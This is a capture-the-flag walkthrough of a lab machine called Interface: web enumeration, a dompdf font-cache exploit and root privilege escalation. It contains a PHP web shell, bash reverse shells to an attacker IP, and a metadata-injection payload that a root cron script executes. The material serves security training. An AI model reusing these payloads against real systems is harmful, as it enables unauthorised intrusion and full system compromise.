Nmap...
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:53 IST
Nmap scan report for 10.10.11.200
Host is up (0.087s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 4.89 seconds
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:53 IST
Nmap scan report for 10.10.11.200
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72:89:a0:95:7e:ce:ae:a8:59:6b:2d:2d:bc:90:b5:5a (RSA)
| 256 01:84:8c:66:d3:4e:c4:b1:61:1f:2d:4d:38:9c:42:c3 (ECDSA)
|_ 256 cc:62:90:55:60:a6:58:62:9e:6b:80:10:5c:79:9b:55 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-title: Site Maintenance
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.25 seconds
Fuzzing directories on http did not lead me anywhere,
I requested the / directory in burp.
Found a subdomanprd.m.rendering-api.interface.htb
Also it is using next-js at backend.
I ll add it to my /etc/hosts file.
I ll change the content type to json as it is using next js.
Still file not found
I started to fuzz endpoints.
➜ wordlists ffuf -u "http://prd.m.rendering-api.interface.htb/FUZZ" -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt -mc all --fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://prd.m.rendering-api.interface.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 0
________________________________________________
[Status: 404, Size: 50, Words: 3, Lines: 1, Duration: 87ms]
* FUZZ: api
I found /api.
I did not find anything inside /api till i used a POST method to fuzz
Found html2pdf endpoint->
➜ wordlists ffuf -u "http://prd.m.rendering-api.interface.htb/api/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -mc all --fs 50 -d 'a=a'
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://prd.m.rendering-api.interface.htb/api/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt
:: Data : a=a
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 50
________________________________________________
[Status: 422, Size: 36, Words: 2, Lines: 1, Duration: 87ms]
* FUZZ: html2pdf
I ll change the content type to json and fuzz parameter
➜ Interface ffuf -request requests -request-proto http -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -mc all --fs 36
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : http://prd.m.rendering-api.interface.htb/api/html2pdf
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
:: Header : User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
:: Header : Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
:: Header : Accept-Language: en-US,en;q=0.5
:: Header : Accept-Encoding: gzip, deflate
:: Header : Upgrade-Insecure-Requests: 1
:: Header : Host: prd.m.rendering-api.interface.htb
:: Header : DNT: 1
:: Header : Connection: close
:: Header : Content-Type: application/json
:: Data : { "FUZZ":"<p>hasdf</p>"
}
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response size: 36
________________________________________________
[Status: 200, Size: 1132, Words: 116, Lines: 77, Duration: 229ms]
* FUZZ: html
I ll copy the pdf to my system
Using exiftool against the pdf file.
➜ pdf exiftool hello.pdf
ExifTool Version Number : 12.65
File Name : hello.pdf
Directory : .
File Size : 1131 bytes
File Modification Date/Time : 2024:01:29 10:57:46+05:30
File Access Date/Time : 2024:01:29 10:57:48+05:30
File Inode Change Date/Time : 2024:01:29 10:57:46+05:30
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.7
Linearized : No
Page Count : 1
Producer : dompdf 1.2.0 + CPDF
Create Date : 2024:01:29 05:26:24+00:00
Modify Date : 2024:01:29 05:26:24+00:00
➜ pdf
I ll clone the repo and make some changes.
Exploit.css
@font-face {
font-family:'exploitfont';
src:url('http://10.10.14.10/exploit_font.php');
font-weight:'normal';
font-style:'normal';
}
Added this in exploit_font.php<?php system($_REQUEST['cmd']); ?>
I ll start a web server at port 80, and request for the exploit.css which will request for exploit_font.php which will eventually perform a remote code execution.
➜ exploit git:(main) ✗ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.200 - - [29/Jan/2024 13:18:38] "GET /exploit.css HTTP/1.0" 200 -
10.10.11.200 - - [29/Jan/2024 13:18:38] "GET /exploit_font.php HTTP/1.0" 200 -
/vendor/dompdf/dompdf/lib/fonts/[family]_[style]_[m5d(url)].php/vendor/dompdf/dompdf/lib/fonts/exploitfont_normal_aafcdbbbcd76ebb26e18f81199c90866.php
I ll get a reverse shell.
index.html
➜ exploit git:(main) ✗ cat index.html
bash -c "bash -i >& /dev/tcp/10.10.14.10/9001 0>&1"
Got shell
I did not see any credentials so i launched pspy on target.
I ll take a look at cleancache.sh
www-data@interface:/opt$ cat /usr/local/sbin/cleancache.sh
#! /bin/bash
cache_directory="/tmp"
for cfile in "$cache_directory"/*; do
if [[ -f "$cfile" ]]; then
meta_producer=$(/usr/bin/exiftool -s -s -s -Producer "$cfile" 2>/dev/null | cut -d " " -f1)
if [[ "$meta_producer" -eq "dompdf" ]]; then
echo "Removing $cfile"
rm "$cfile"
fi
fi
done
Always look at where we can inject in the script, its in the meta_producer The if statement is doing some arithmetic equation, it is what is vulnerable to code injection.
www-data@interface:/dev/shm$ cat rev.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
www-data@interface:/dev/shm$ chmod +x rev.sh
www-data@interface:/dev/shm$ touch hello
ww-data@interface:/dev/shm$ exiftool -Producer='arr[$(/dev/shm/rev.sh)]' hello
1 image files updated
www-data@interface:/dev/shm$ exiftool hello
ExifTool Version Number : 12.55
File Name : hello
Directory : .
File Size : 2.9 kB
File Modification Date/Time : 2024:01:29 12:23:38+00:00
File Access Date/Time : 2024:01:29 12:23:38+00:00
File Inode Change Date/Time : 2024:01:29 12:23:38+00:00
File Permissions : -rw-r--r--
File Type : EXV
File Type Extension : exv
MIME Type : image/x-exv
XMP Toolkit : Image::ExifTool 12.55
Producer : arr[$(/dev/shm/rev.sh)]
Now we have injection our payload in Producer, I ll copy the hello file to /tmp, as /tmp is the cache_directory
cp hello /tmp
In a minute or two I got a connection on port 9001